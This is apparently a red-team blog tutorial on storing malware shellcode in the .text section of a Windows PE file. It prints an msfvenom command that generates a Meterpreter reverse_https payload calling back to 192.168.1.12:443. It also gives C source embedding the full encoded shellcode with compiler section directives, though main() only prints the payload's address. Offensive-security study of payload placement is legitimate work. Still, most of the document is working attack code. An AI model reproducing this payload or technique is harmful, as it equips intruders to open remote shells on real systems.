Hello Friends

I’m Rem01x, a penetration tester interested in red teaming and reverse engineering.

This time we will talk about how to store a payload in the .text section of a PE file.

Payload Placement In .text Section

What is the Text Section in the PE File Structure?

First let’s generate the payload with msfvenom (no `x64/` in the payload name, so this is a 32-bit payload; `-b "\x00"` asks for an encoder that strips NUL bytes):

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\x00"

image.png

Now let’s write C code that stores the payload in the .text section of the PE structure. Keep in mind that an ordinary local array initialised inside `main` is a stack variable (its initialiser bytes live in a read-only data section and are copied onto the stack at run time), so it does not end up in .text by itself: the object needs static storage duration and an explicit section directive (`#pragma section(".text")` + `__declspec(allocate(".text"))` on MSVC, `__attribute__((section(".text")))` on GCC/MinGW). Because .text is mapped read+execute, the array must never be written to at run time.

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

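/*
 * Section placement for the payload.
 *
 * A plain `unsigned char buf[] = "..."` declared inside main() is an
 * automatic (stack) object: the compiler keeps the initialiser bytes in a
 * read-only data section (.rdata on MSVC) and copies them onto the stack on
 * every call, so the bytes are NOT in .text.  To really land them in .text
 * the object needs static storage duration plus a compiler-specific section
 * directive:
 *   - MSVC:        #pragma section(".text") + __declspec(allocate(".text"))
 *   - GCC/Clang:   __attribute__((section(".text")))
 * On an unknown compiler the macro expands to nothing and the array falls
 * back to the default read-only data section.
 */
#if defined(_MSC_VER)
#pragma section(".text")
#define PAYLOAD_SECTION __declspec(allocate(".text"))
#elif defined(__GNUC__)
#define PAYLOAD_SECTION __attribute__((section(".text")))
#else
#define PAYLOAD_SECTION
#endif

/*
 * Raw payload bytes, generated with:
 *   msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\x00"
 *
 * Declared const because .text is mapped read+execute: any write to it at
 * run time would fault.  NOTE(review): `-b "\x00"` makes msfvenom pick an
 * encoder, and the common x86 encoders (e.g. shikata_ga_nai) decode
 * themselves in place, so a payload like this cannot be executed directly
 * from a read-only section -- it would have to be copied to writable,
 * executable memory first.  Confirm which encoder msfvenom selected.
 */
PAYLOAD_SECTION static const unsigned char textshellcode[] =
    "\xb8\xc9\xe3\x83\xe1\xdb\xcc\xd9\x74\x24\xf4\x5a\x31\xc9"
    "\xb1\x8a\x83\xc2\x04\x31\x42\x10\x03\x42\x10\x2b\x16\x7f"
    "\x09\x24\xd9\x80\xca\x5a\xeb\x52\x43\x7f\x6f\xd8\x06\x4f"
    "\xfb\x8c\xaa\x24\xa9\x24\xbc\x8d\x04\x63\xf3\x0e\x13\x19"
    "\xdb\xc1\xe4\x72\x27\x40\x99\x88\x74\xa2\xa0\x42\x89\xa3"
    "\xe5\x14\xe7\x4c\xbb\x2d\x55\x82\xb7\x70\x66\xa3\x17\xff"
    "\xd6\xdb\x12\xc0\x80\x6f\x51\xc0\xfe\x04\x31\xe2\xff\xc9"
    "\x49\xaa\xe7\xbd\xc8\xe2\x6c\x01\xe2\x0b\xc5\xf2\x30\x7f"
    "\xd7\xd2\x08\xbf\x19\x15\x67\x93\x9b\x6e\x40\x0b\xee\x84"
    "\xb2\xb6\xe9\x5f\xc8\x6c\x7f\x7f\x6a\xe6\x27\x5b\x8a\x2b"
    "\xb1\x28\x80\x80\xb5\x76\x85\x17\x19\x0d\xb1\x9c\x9c\xc1"
    "\x33\xe6\xba\xc5\x18\xbc\xa3\x5c\xc5\x13\xdb\xbe\xa1\xcc"
    "\x79\xb5\x40\x1a\xfd\x36\x9b\x23\xa3\xa0\x0a\xb9\x28\x30"
    "\xbb\x36\xb8\x5e\x52\xed\x52\xd2\xd3\x2b\xa4\x15\xce\x05"
    "\x71\xba\xa2\x36\xd6\x6f\xad\xca\xd8\x8f\x2d\x60\xb6\xf5"
    "\x44\x16\x24\x68\xb8\xd3\x9a\x5a\xe6\x33\xae\xfb\x85\x2a"
    "\x5e\x8f\x26\xde\xf6\x54\x99\x69\x69\xde\xbc\x05\x55\x53"
    "\x5e\xb5\xb5\x24\xf3\x19\xee\x9a\xc2\x6a\x51\xeb\x0d\xad"
    "\x2c\x7b\x3e\xc1\xcb\x2c\xdb\x7b\x5f\xbb\x57\x53\x69\x0b"
    "\xad\x85\xa4\x45\xfc\xec\xe6\xb1\xb5\x46\xb3\x8c\x05\x7b"
    "\x1b\x62\xff\xe8\x3e\x5a\xb8\x8b\xa3\xf1\x29\x7d\x04\x53"
    "\xd3\x0f\x37\x32\x74\x9e\x98\xf5\xbc\x70\xd6\xd5\x93\xed"
    "\x7e\x74\x66\x87\x51\x40\xb6\x62\x80\x9d\x98\xbd\xe9\xdd"
    "\x8c\x87\x47\xa4\xeb\x07\xb2\x05\xa7\x9d\x3e\xfa\x14\x0a"
    "\xfa\xfd\x9a\xca\x14\x36\x9a\xca\xe4\xe7\xee\xae\xa7\x8d"
    "\x4f\x4c\x44\x06\x40\xa2\xd1\x8c\xcc\x80\xa0\x1a\x68\x36"
    "\x04\xc3\x43\x5f\xd3\x47\x9c\xf5\x6b\x2e\x94\x67\x38\xd6"
    "\x69\x2e\xa7\x57\x33\x94\x6b\x0d\xda\x70\x3a\xe5\x2a\xb2"
    "\x88\x7c\x2b\xf1\x6b\x24\x8a\xb6\x30\xe0\x55\x7f\xb7\x40"
    "\x0e\x28\x3e\xff\x08\x29\x95\x76\x52\x85\x7e\x88\x69\xc2"
    "\xfb\xdb\xde\x41\x53\x88\xb6\x0d\xb0\x7b\x19\xf5\xb9\x56"
    "\xf3\x63\x4c\x07\x94\xf3\x63\xb7\x64\x7d\x63\xdd\x60\x2d"
    "\x0e\x3e\x3f\xa5\xbb\x06\x21\xb3\xbb\x53\x0e\xef\x10\x08"
    "\xe7\x67\xba\xa8\x1f\x03\x3b\x61\x9a\x33\xb6\x9d\xcd\x3b"
    "\x2a\x9d\x0d\x54\x09\x6d\x38\x44\x6e\x58\x0c\xf1\x5c\x8a"
    "\xda\xf9\x5e\x4a\xb7\xb9\x36\x4a\x57\x3a\xc7\x22\x57\x3a"
    "\x87\xb2\x04\x52\x5f\x16\xf9\x47\xa0\x83\x6d\xd4\x0c\xa2"
    "\x75\x8c\xda\xb4\x59\x33\x1b\xe7\xcf\x5b\x09\x91\x79\x79"
    "\xd2\x48\xfc\xbe\x59\xbd\x74\x39\xa3\x82\x0e\x86\xd6\xe1"
    "\x49\xc4\x46\x01\x02\x35\x87\x2e\xe4\xf0\x4a\xfe\x36\x35"
    "\x93\xd0\x09\x17\xd2\x1e\x6a\xdc\xe4\xeb\xc8\x74\x6f\x13"
    "\x5e\x86\xba";

/*
 * Entry point: prints a banner and the address the payload was placed at,
 * so it can be checked against the .text range in a PE viewer or debugger.
 * The payload is never executed here.
 *
 * Returns EXIT_SUCCESS (from <stdlib.h>).
 */
int main(void)
{
    printf("Rem01x Malware Development Journey\n");
    /* %p output is implementation-defined; the explicit "0x" prefix matches
     * the MSVC CRT, which prints bare hex digits (glibc would already add
     * "0x"). The cast keeps %p's argument type correct. */
    printf("Hello I'm the Paylaod my address is: 0x%p", (const void *)textshellcode);
    return EXIT_SUCCESS;
}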